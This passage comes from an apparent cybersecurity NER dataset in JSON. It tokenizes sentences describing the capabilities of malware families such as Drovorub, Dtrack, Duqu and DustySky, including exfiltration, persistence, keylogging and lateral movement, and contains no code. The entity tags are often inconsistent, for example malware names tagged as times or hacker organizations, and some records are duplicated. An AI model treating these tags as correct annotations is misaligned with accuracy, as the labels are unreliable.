"infected", - "machine's", - "settings." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DropBook", - "can", - "communicate", - "with", - "its", - "operators", - "by", - "exploiting", - "the", - "Simplenote,", - "DropBox,", - "and", - "the", - "social", - "media", - "platform,", - "Facebook,", - "where", - "it", - "can", - "create", - "fake", - "accounts", - "to", - "control", - "the", - "backdoor", - "and", - "receive", - "instructions." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "O", - "I-Idus", - "I-Idus", - "O", - "B-Org", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "DropBook", - "can", - "execute", - "arbitrary", - "shell", - "commands", - "on", - "the", - "victims'", - "machines." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Drovorub", - "can", - "transfer", - "files", - "from", - "the", - "victim", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Drovorub", - "has", - "de-obsfuscated", - "XOR", - "encrypted", - "payloads", - "in", - "WebSocket", - "messages." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Drovorub", - "can", - "exfiltrate", - "files", - "over", - "C2", - "infrastructure." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Drovorub", - "can", - "delete", - "specific", - "files", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Drovorub", - "can", - "download", - "files", - "to", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Drovorub", - "can", - "use", - "a", - "port", - "forwarding", - "rule", - "on", - "its", - "agent", - "module", - "to", - "relay", - "network", - "traffic", - "through", - "the", - "client", - "module", - "to", - "a", - "remote", - "host", - "on", - "the", - "same", - "network." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-Way", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Drovorub", - "can", - "use", - "kernel", - "modules", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Drovorub", - "can", - "use", - "TCP", - "to", - "communicate", - "between", - "its", - "agent", - "and", - "client", - "modules." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Drovorub", - "has", - "used", - "XOR", - "encrypted", - "payloads", - "in", - "WebSocket", - "client", - "to", - "server", - "messages." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Drovorub", - "has", - "used", - "a", - "kernel", - "module", - "rootkit", - "to", - "hide", - "processes,", - "files,", - "executables,", - "and", - "network", - "artifacts", - "from", - "user", - "space", - "view." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Drovorub", - "can", - "execute", - "arbitrary", - "commands", - "as", - "root", - "on", - "a", - "compromised", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Drovorub", - "can", - "use", - "the", - "WebSocket", - "protocol", - "and", - "has", - "initiated", - "communication", - "with", - "C2", - "servers", - "with", - "an", - "HTTP", - "Upgrade", - "request." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dtrack", - "packs", - "collected", - "data", - "into", - "a", - "password", - "protected", - "archive." - ], - "ner_tags": [ - "B-SamFile", - "I-SamFile", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dtrack’s", - "RAT", - "makes", - "a", - "persistent", - "target", - "file", - "with", - "auto", - "execution", - "on", - "the", - "host", - "start." - ], - "ner_tags": [ - "B-Idus", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dtrack", - "can", - "retrieve", - "browser", - "history." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dtrack", - "can", - "collect", - "a", - "variety", - "of", - "information", - "from", - "victim", - "machines." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dtrack", - "has", - "used", - "a", - "decryption", - "routine", - "that", - "is", - "part", - "of", - "an", - "executable", - "physical", - "patch." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dtrack", - "has", - "used", - "a", - "dropper", - "that", - "embeds", - "an", - "encrypted", - "payload", - "as", - "extra", - "data." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dtrack", - "can", - "remove", - "its", - "persistence", - "and", - "delete", - "itself." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dtrack", - "can", - "list", - "files", - "on", - "available", - "disk", - "volumes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "One", - "of", - "Dtrack", - "can", - "replace", - "the", - "normal", - "flow", - "of", - "a", - "program", - "execution", - "with", - "malicious", - "code." - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dtrack’s", - "can", - "download", - "and", - "upload", - "a", - "file", - "to", - "the", - "victim’s", - "computer." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dtrack’s", - "dropper", - "contains", - "a", - "keylogging", - "executable." - ], - "ner_tags": [ - "B-Idus", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dtrack", - "can", - "save", - "collected", - "data", - "to", - "disk,", - "different", - "file", - "formats,", - "and", - "network", - "shares." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "One", - "of", - "Dtrack", - "can", - "hide", - "in", - "replicas", - "of", - "legitimate", - "programs", - "like", - "OllyDbg,", - "7-Zip,", - "and", - "FileZilla." - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Dtrack’s", - "dropper", - "can", - "list", - "all", - "running", - "processes." - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dtrack", - "has", - "used", - "process", - "hollowing", - "shellcode", - "to", - "target", - "a", - "predefined", - "list", - "of", - "processes", - "from", - "<code>%SYSTEM32%</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dtrack", - "can", - "collect", - "the", - "RegisteredOwner,", - "RegisteredOrganization,", - "and", - "InstallDate", - "registry", - "values." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Dtrack", - "contains", - "a", - "function", - "that", - "calls", - "<code>LoadLibrary</code>", - "and", - "<code>GetProcAddress</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Dtrack", - "can", - "collect", - "the", - "victim's", - "computer", - "name,", - "hostname", - "and", - "adapter", - "information", - "to", - "create", - "a", - "unique", - "identifier." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Dtrack", - "can", - "collect", - "the", - "host's", - "IP", - "addresses", - "using", - "the", - "<code>ipconfig</code>", - "command." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dtrack", - "can", - "collect", - "network", - "and", - "active", - "connection", - "information." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dtrack", - "used", - "hard-coded", - "credentials", - "to", - "gain", - "access", - "to", - "a", - "network", - "share." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dtrack", - "has", - "used", - "<code>cmd.exe</code>", - "to", - "add", - "a", - "persistent", - "service." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dtrack", - "can", - "add", - "a", - "service", - "called", - "WBService", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Duqu", - "examines", - "running", - "system", - "processes", - "for", - "tokens", - "that", - "have", - "specific", - "system", - "privileges.", - "If", - "it", - "finds", - "one,", - "it", - "will", - "copy", - "the", - "token", - "and", - "store", - "it", - "for", - "later", - "use.", - "Eventually", - "it", - "will", - "start", - "new", - "processes", - "with", - "the", - "stored", - "token", - "attached.", - "It", - "can", - "also", - "steal", - "tokens", - "to", - "acquire", - "administrative", - "privileges." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Duqu", - "uses", - "a", - "custom", - "command", - "and", - "control", - "protocol", - "that", - "communicates", - "over", - "commonly", - "used", - "ports,", - "and", - "is", - "frequently", - "encapsulated", - "by", - "application", - "layer", - "protocols." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "discovery", - "modules", - "used", - "with", - "Duqu", - "can", - "collect", - "information", - "on", - "open", - "windows." - ], - "ner_tags": [ - "O", - "B-Tool", - "O", - "O", - "O", - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Modules", - "can", - "be", - "pushed", - "to", - "and", - "executed", - "by", - "Duqu", - "that", - "copy", - "data", - "to", - "a", - "staging", - "area,", - "compress", - "it,", - "and", - "XOR", - "encrypt", - "it." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Duqu", - "will", - "inject", - "itself", - "into", - "different", - "processes", - "to", - "evade", - "detection.", - "The", - "selection", - "of", - "the", - "target", - "process", - "is", - "influenced", - "by", - "the", - "security", - "software", - "that", - "is", - "installed", - "on", - "the", - "system", - "(Duqu", - "will", - "inject", - "into", - "different", - "processes", - "depending", - "on", - "which", - "security", - "suite", - "is", - "installed", - "on", - "the", - "infected", - "host)." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Duqu", - "can", - "be", - "configured", - "to", - "have", - "commands", - "relayed", - "over", - "a", - "peer-to-peer", - "network", - "of", - "infected", - "hosts", - "if", - "some", - "of", - "the", - "hosts", - "do", - "not", - "have", - "Internet", - "access." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Duqu", - "can", - "track", - "key", - "presses", - "with", - "a", - "keylogger", - "module." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "discovery", - "modules", - "used", - "with", - "Duqu", - "can", - "collect", - "information", - "on", - "accounts", - "and", - "permissions." - ], - "ner_tags": [ - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Modules", - "can", - "be", - "pushed", - "to", - "and", - "executed", - "by", - "Duqu", - "that", - "copy", - "data", - "to", - "a", - "staging", - "area,", - "compress", - "it,", - "and", - "XOR", - "encrypt", - "it." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Duqu", - "has", - "used", - "<code>msiexec</code>", - "to", - "execute", - "malicious", - "Windows", - "Installer", - "packages.", - "Additionally,", - "a", - "PROPERTY=VALUE", - "pair", - "containing", - "a", - "56-bit", - "encryption", - "key", - "has", - "been", - "used", - "to", - "decrypt", - "the", - "main", - "payload", - "from", - "the", - "installer", - "packages." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "discovery", - "modules", - "used", - "with", - "Duqu", - "can", - "collect", - "information", - "on", - "process", - "details." - ], - "ner_tags": [ - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Duqu", - "is", - "capable", - "of", - "loading", - "executable", - "code", - "via", - "process", - "hollowing." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "Duqu", - "uses", - "a", - "custom", - "command", - "and", - "control", - "protocol", - "that", - "communicates", - "over", - "commonly", - "used", - "ports,", - "and", - "is", - "frequently", - "encapsulated", - "by", - "application", - "layer", - "protocols." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Adversaries", - "can", - "instruct", - "Duqu", - "to", - "spread", - "laterally", - "by", - "copying", - "itself", - "to", - "shares", - "it", - "has", - "enumerated", - "and", - "for", - "which", - "it", - "has", - "obtained", - "legitimate", - "credentials", - "(via", - "keylogging", - "or", - "other", - "means).", - "The", - "remote", - "host", - "is", - "then", - "infected", - "by", - "using", - "the", - "compromised", - "credentials", - "to", - "schedule", - "a", - "task", - "on", - "remote", - "machines", - "that", - "executes", - "the", - "malware." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Adversaries", - "can", - "instruct", - "Duqu", - "to", - "spread", - "laterally", - "by", - "copying", - "itself", - "to", - "shares", - "it", - "has", - "enumerated", - "and", - "for", - "which", - "it", - "has", - "obtained", - "legitimate", - "credentials", - "(via", - "keylogging", - "or", - "other", - "means).", - "The", - "remote", - "host", - "is", - "then", - "infected", - "by", - "using", - "the", - "compromised", - "credentials", - "to", - "schedule", - "a", - "task", - "on", - "remote", - "machines", - "that", - "executes", - "the", - "malware." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "When", - "the", - "Duqu", - "command", - "and", - "control", - "is", - "operating", - "over", - "HTTP", - "or", - "HTTPS,", - "Duqu", - "uploads", - "data", - "to", - "its", - "controller", - "by", - "appending", - "it", - "to", - "a", - "blank", - "JPG", - "file." - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Duqu", - "command", - "and", - "control", - "protocol's", - "data", - "stream", - "can", - "be", - "encrypted", - "with", - "AES-CBC." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "The", - "reconnaissance", - "modules", - "used", - "with", - "Duqu", - "can", - "collect", - "information", - "on", - "network", - "configuration." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "discovery", - "modules", - "used", - "with", - "Duqu", - "can", - "collect", - "information", - "on", - "network", - "connections." - ], - "ner_tags": [ - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Adversaries", - "can", - "instruct", - "Duqu", - "to", - "spread", - "laterally", - "by", - "copying", - "itself", - "to", - "shares", - "it", - "has", - "enumerated", - "and", - "for", - "which", - "it", - "has", - "obtained", - "legitimate", - "credentials", - "(via", - "keylogging", - "or", - "other", - "means).", - "The", - "remote", - "host", - "is", - "then", - "infected", - "by", - "using", - "the", - "compromised", - "credentials", - "to", - "schedule", - "a", - "task", - "on", - "remote", - "machines", - "that", - "executes", - "the", - "malware." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Duqu", - "creates", - "a", - "new", - "service", - "that", - "loads", - "a", - "malicious", - "driver", - "when", - "the", - "system", - "starts.", - "When", - "Duqu", - "is", - "active,", - "the", - "operating", - "system", - "believes", - "that", - "the", - "driver", - "is", - "legitimate,", - "as", - "it", - "has", - "been", - "signed", - "with", - "a", - "valid", - "private", - "key." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DustySky", - "can", - "compress", - "files", - "via", - "RAR", - "while", - "staging", - "data", - "to", - "be", - "exfiltrated." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Features", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DustySky", - "has", - "exfiltrated", - "data", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DustySky", - "has", - "two", - "hard-coded", - "domains", - "for", - "C2", - "servers;", - "if", - "the", - "first", - "does", - "not", - "respond,", - "it", - "will", - "try", - "the", - "second." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DustySky", - "can", - "delete", - "files", - "it", - "creates", - "from", - "the", - "infected", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DustySky", - "scans", - "the", - "victim", - "for", - "files", - "that", - "contain", - "certain", - "keywords", - "and", - "document", - "types", - "including", - "PDF,", - "DOC,", - "DOCX,", - "XLS,", - "and", - "XLSX,", - "from", - "a", - "list", - "that", - "is", - "obtained", - "from", - "the", - "C2", - "as", - "a", - "text", - "file.", - "It", - "can", - "also", - "identify", - "logical", - "drives", - "for", - "the", - "infected", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "B-Way", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DustySky", - "contains", - "a", - "keylogger." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "DustySky", - "searches", - "for", - "network", - "drives", - "and", - "removable", - "media", - "and", - "duplicates", - "itself", - "onto", - "them." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "B-Features", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DustySky", - "created", - "folders", - "in", - "temp", - "directories", - "to", - "host", - "collected", - "files", - "before", - "exfiltration." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "DustySky", - "dropper", - "uses", - "a", - "function", - "to", - "obfuscate", - "the", - "name", - "of", - "functions", - "and", - "other", - "parts", - "of", - "the", - "malware." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DustySky", - "can", - "detect", - "connected", - "USB", - "devices." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DustySky", - "collects", - "information", - "about", - "running", - "processes", - "from", - "victims." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DustySky", - "achieves", - "persistence", - "by", - "creating", - "a", - "Registry", - "entry", - "in", - "<code>HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run</code>." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "DustySky", - "searches", - "for", - "removable", - "media", - "and", - "duplicates", - "itself", - "onto", - "it." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DustySky", - "captures", - "PNG", - "screenshots", - "of", - "the", - "main", - "screen." - ], - "ner_tags": [ - "B-Way", - "O", - "B-HackOrg", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DustySky", - "checks", - "for", - "the", - "existence", - "of", - "anti-virus." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DustySky", - "lists", - "all", - "installed", - "software", - "for", - "the", - "infected", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DustySky", - "extracts", - "basic", - "information", - "about", - "the", - "operating", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DustySky", - "has", - "used", - "both", - "HTTP", - "and", - "HTTPS", - "for", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "DustySky", - "dropper", - "uses", - "Windows", - "Management", - "Instrumentation", - "to", - "extract", - "information", - "about", - "the", - "operating", - "system", - "and", - "whether", - "an", - "anti-virus", - "is", - "active." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "B-Tool", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dyre", - "decrypts", - "resources", - "needed", - "for", - "targeting", - "the", - "victim." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dyre", - "injects", - "into", - "other", - "processes", - "to", - "load", - "modules." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dyre", - "has", - "the", - "ability", - "to", - "send", - "information", - "staged", - "on", - "a", - "compromised", - "host", - "externally", - "to", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dyre", - "has", - "a", - "command", - "to", - "download", - "and", - "executes", - "additional", - "files." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Dyre", - "has", - "the", - "ability", - "to", - "create", - "files", - "in", - "a", - "TEMP", - "folder", - "to", - "act", - "as", - "a", - "database", - "to", - "store", - "information." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "Dyre", - "has", - "the", - "ability", - "to", - "directly", - "inject", - "its", - "code", - "into", - "the", - "web", - "browser", - "process." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dyre", - "has", - "the", - "ability", - "to", - "achieve", - "persistence", - "by", - 